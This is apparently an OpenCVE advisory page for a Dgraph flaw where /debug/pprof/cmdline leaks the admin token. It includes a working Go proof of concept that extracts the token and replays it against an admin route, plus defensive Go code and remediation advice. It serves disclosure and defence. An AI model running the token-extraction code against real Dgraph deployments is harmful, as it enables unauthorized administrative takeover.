Description
Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security "token=..." startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2.
Published: 2026-04-15
Score: 9.4 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Unauthorized privileged administrative access
Action: Immediate Patch
AI Analysis

Impact

Dgraph exposes the full process command line through the /debug/pprof/cmdline endpoint without requiring authentication. When the admin token is supplied through the --security "token=..." startup flag it is part of that command line, so anyone who can reach the Alpha HTTP port can read it and replay it in the X-Dgraph-AuthToken header to pass the adminAuthHandler check. The result is administrative access to admin-only routes such as /admin/config/cache_mb, including configuration changes and operational control actions, in any deployment whose Alpha HTTP port is reachable by untrusted parties.
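The chain above in working form, as an added example written for this page (it is not Dgraph's code and not part of the advisory): a Go program that fetches /debug/pprof/cmdline, parses the NUL-separated command line for a --security token, and replays the value in X-Dgraph-AuthToken against /admin/config/cache_mb. It runs offline against a constructed stand-in server (fakeAlpha) whose sample token and 401 behaviour are this example's assumptions, and the two --security flag shapes it parses are assumed from the advisory's `--security "token=..."` wording. Point checkAlpha at a real Alpha's base URL only on systems you are authorized to test.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// extractToken scans a /debug/pprof/cmdline body (the process's os.Args joined
// by NUL bytes, which is what Go's pprof Cmdline handler writes) for Dgraph's
// --security superflag and returns its token= option. Both flag shapes handled
// here are assumptions based on the advisory's `--security "token=..."`.
func extractToken(cmdline string) (string, bool) {
	args := strings.Split(cmdline, "\x00")
	for i, a := range args {
		var sec string
		switch {
		case a == "--security" && i+1 < len(args):
			sec = args[i+1] // --security "token=...; whitelist=..."
		case strings.HasPrefix(a, "--security="):
			sec = strings.TrimPrefix(a, "--security=") // --security=token=...
		default:
			continue
		}
		for _, kv := range strings.Split(sec, ";") {
			kv = strings.TrimSpace(kv)
			if strings.HasPrefix(kv, "token=") && len(kv) > len("token=") {
				return strings.TrimPrefix(kv, "token="), true
			}
		}
	}
	return "", false
}

// checkAlpha issues the unauthenticated request the advisory describes and
// reports whether the returned command line carries an admin token.
func checkAlpha(c *http.Client, baseURL string) (token string, leaked bool, err error) {
	resp, err := c.Get(baseURL + "/debug/pprof/cmdline")
	if err != nil {
		return "", false, err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return "", false, nil // endpoint not served: nothing to extract
	}
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return "", false, err
	}
	token, leaked = extractToken(string(body))
	return token, leaked, nil
}

// adminStatus replays a token in X-Dgraph-AuthToken against an admin route (the
// second half of the chain in the advisory) and returns the HTTP status, 0 on error.
func adminStatus(c *http.Client, baseURL, token string) int {
	req, _ := http.NewRequest(http.MethodGet, baseURL+"/admin/config/cache_mb", nil)
	if token != "" {
		req.Header.Set("X-Dgraph-AuthToken", token)
	}
	resp, err := c.Do(req)
	if err != nil {
		return 0
	}
	resp.Body.Close()
	return resp.StatusCode
}

// fakeAlpha is a constructed stand-in for a vulnerable Alpha, not Dgraph code.
// It serves a sample command line on the pprof path and gates one admin route on
// the same token. Its 401 for a missing or wrong token is this stand-in's choice.
func fakeAlpha() *httptest.Server {
	const token = "example-admin-token" // sample value, not a real credential
	cmdline := strings.Join([]string{
		"/usr/local/bin/dgraph", "alpha",
		"--security", "token=" + token + "; whitelist=10.0.0.0/8",
	}, "\x00")
	mux := http.NewServeMux()
	mux.HandleFunc("/debug/pprof/cmdline", func(w http.ResponseWriter, r *http.Request) {
		io.WriteString(w, cmdline)
	})
	mux.HandleFunc("/admin/config/cache_mb", func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("X-Dgraph-AuthToken") != token {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		io.WriteString(w, `{"cache_mb":1024}`)
	})
	return httptest.NewServer(mux)
}

func main() {
	srv := fakeAlpha()
	defer srv.Close()
	c := srv.Client()
	token, leaked, err := checkAlpha(c, srv.URL)
	fmt.Printf("cmdline leak: leaked=%v token=%q err=%v\n", leaked, token, err)
	fmt.Printf("admin route: without token %d, with leaked token %d\n",
		adminStatus(c, srv.URL, ""), adminStatus(c, srv.URL, token))
}
```

Running it prints the token recovered from the command line and the admin route's status with and without it. A non-200 answer from /debug/pprof/cmdline is reported as no leak, since there is nothing to parse; a 200 whose body contains no token= option is also reported as no leak, which is the case when the admin token is not passed on the command line at all.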

Affected Systems

Vulnerable products are dgraph-io dgraph (Dgraph) releases 25.3.1 and earlier. The issue is exploitable when the Alpha HTTP port is reachable by untrusted network participants and the admin token is passed on the command line via --security "token=..."; any deployment of these versions in such an environment is susceptible.

Risk and Exploitability

The vulnerability has a CVSS v3.1 base score of 9.4 (vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L): network-reachable, low complexity, no privileges or user interaction required. Its EPSS probability is below 1% and it is not listed in the CISA KEV catalog, but the SSVC assessment recorded in the history below rates exploitation as proof-of-concept and the attack as automatable. The attack is a single unauthenticated HTTP GET to /debug/pprof/cmdline, a profiling endpoint registered on the default HTTP mux, followed by reuse of the disclosed token; exploitation is straightforward for anyone with network access to the Alpha HTTP port.

Generated by OpenCVE AI on April 16, 2026 at 02:19 UTC.

Remediation

Fixed in Dgraph 25.3.2 (see the GitHub advisory GHSA-95mq-xwj4-r47p below). No workaround other than restricting network access to the Alpha HTTP port is documented.

OpenCVE Recommended Actions

  • Upgrade Dgraph to version 25.3.2 or later, the release the GitHub advisory lists as fixed.
  • Until the upgrade is done, keep untrusted clients off the Alpha HTTP port: firewall it to trusted hosts, bind it to a loopback or internal interface where every legitimate client is local, or put a reverse proxy in front that rejects the /debug/ path prefix. The pprof handlers share the Alpha HTTP listener with the regular API, so any client that can reach the API can also fetch /debug/pprof/cmdline unless a proxy or firewall filters the path.
  • Treat any token that was passed via --security "token=..." on an exposed 25.3.1 or earlier Alpha as compromised: rotate it to a new value, but only once the endpoint is no longer reachable, since a new token placed on the command line of an unpatched, exposed Alpha leaks the same way. Review the affected Alphas for unexpected configuration changes made through the admin endpoints.
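The network-level advice above has a code-level counterpart for any Go service, which is where this bug class comes from: importing net/http/pprof registers its handlers on http.DefaultServeMux in init(), so a server that hands the default mux to ListenAndServe exposes them to every client. The following added example is written for this page, not taken from Dgraph or its fix, and shows the controls the list describes in code: a dedicated public mux that never inherits default-mux registrations, the pprof handlers on a loopback-only listener, and a /debug/ prefix deny as the stop-gap a reverse proxy would apply. The function names (publicRoutes, debugRoutes, denyDebugPrefix, serveDebugOnLoopback, statusOf) are this example's own.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/http/pprof" // importing this registers /debug/pprof/* on http.DefaultServeMux in init()
	"strings"
)

// publicRoutes is the mux bound to the externally reachable port. Because it is a
// fresh http.NewServeMux, nothing that any package registered on
// http.DefaultServeMux at init time is reachable through it.
func publicRoutes() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/health", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, "ok")
	})
	return mux
}

// debugRoutes carries the profiling handlers explicitly, so exposing them is a
// deliberate decision rather than an import side effect.
func debugRoutes() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/debug/pprof/", pprof.Index)
	mux.HandleFunc("/debug/pprof/cmdline", pprof.Cmdline)
	mux.HandleFunc("/debug/pprof/profile", pprof.Profile)
	mux.HandleFunc("/debug/pprof/symbol", pprof.Symbol)
	mux.HandleFunc("/debug/pprof/trace", pprof.Trace)
	return mux
}

// serveDebugOnLoopback binds the debug mux to 127.0.0.1 only, the in-process
// form of "expose the endpoint only on localhost". Port 0 picks a free port.
func serveDebugOnLoopback() (net.Listener, error) {
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return nil, err
	}
	go http.Serve(ln, debugRoutes())
	return ln, nil
}

// denyDebugPrefix is the stop-gap for a binary you cannot change yet: a front
// handler (the same rule a reverse proxy would enforce) that refuses the whole
// /debug/ prefix before the request reaches the vulnerable mux.
func denyDebugPrefix(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if strings.HasPrefix(r.URL.Path, "/debug/") {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// statusOf serves h on an ephemeral test server and returns the status for path.
func statusOf(h http.Handler, path string) int {
	srv := httptest.NewServer(h)
	defer srv.Close()
	resp, err := srv.Client().Get(srv.URL + path)
	if err != nil {
		return 0
	}
	resp.Body.Close()
	return resp.StatusCode
}

func main() {
	const p = "/debug/pprof/cmdline"
	fmt.Println("default mux (import side effect):", statusOf(http.DefaultServeMux, p))
	fmt.Println("default mux behind denyDebugPrefix:", statusOf(denyDebugPrefix(http.DefaultServeMux), p))
	fmt.Println("dedicated public mux:", statusOf(publicRoutes(), p))
	ln, err := serveDebugOnLoopback()
	if err != nil {
		fmt.Println("loopback listener:", err)
		return
	}
	defer ln.Close()
	resp, err := http.Get("http://" + ln.Addr().String() + p)
	if err == nil {
		resp.Body.Close()
		fmt.Println("loopback debug listener:", resp.StatusCode)
	}
}
```

The default mux answers 200 on the cmdline path purely because of the import; the public mux answers 404 for the same request, the prefix deny answers 403, and the loopback listener still serves the profiler for local operators. Whichever control is used, the token remains in the process command line and readable to anyone with local access to the host, so a secret-bearing flag is still worth moving out of argv where the software allows it.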



Advisories
Source: GitHub GHSA
ID: GHSA-95mq-xwj4-r47p
Title: Dgraph: Unauthenticated /debug/pprof/cmdline discloses admin auth token, enabling unauthorized access to protected Alpha admin endpoints
History

Thu, 16 Apr 2026 12:15:00 +0000

Metrics added: SSVC (version 2.0.3) with Exploitation = poc, Automatable = yes, Technical Impact = total

Thu, 16 Apr 2026 09:15:00 +0000

First time appeared: Dgraph (vendor), Dgraph dgraph (product)
Vendors & Products added: Dgraph, Dgraph dgraph

Wed, 15 Apr 2026 21:00:00 +0000

Description added: the text shown in the Description section at the top of this page
Title added: Dgraph: Unauthenticated pprof endpoint leaks admin auth token
Weaknesses added: CWE-200, CWE-215
References: values not shown on this page
Metrics added: CVSS v3.1 score 9.4, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-16T12:05:10.186Z

Reserved: 2026-04-09T20:59:17.618Z

Link: CVE-2026-40173

Vulnrichment

Updated: 2026-04-16T11:26:13.684Z

NVD

Status: Received

Published: 2026-04-15T21:17:27.197

Modified: 2026-04-16T13:16:49.943

Link: CVE-2026-40173

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T09:00:05Z

Weaknesses